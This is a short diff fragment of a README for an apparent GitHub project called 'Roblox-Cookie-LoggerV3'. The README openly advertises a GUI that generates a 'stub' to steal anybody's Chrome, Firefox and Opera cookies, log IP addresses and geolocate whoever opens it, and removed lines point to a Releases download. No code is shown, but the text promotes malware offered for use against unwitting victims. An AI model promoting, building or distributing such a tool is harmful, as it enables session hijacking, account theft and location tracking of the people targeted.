zbenntt/Roblox-Cookie-LoggerV3/README.md

 2; Ip Logger

 3; Geolocation (Its Like The Ip Logger But Its Exactly Where The Person Opened The Stub)

-# STEPS👣 BELOW
-Go To Releases And Download
-the Open CookieLoggerv3

 # What It Does
 Its a simple gui i made that creates a stub and it steals anybodys chrome, firefox, opera cookies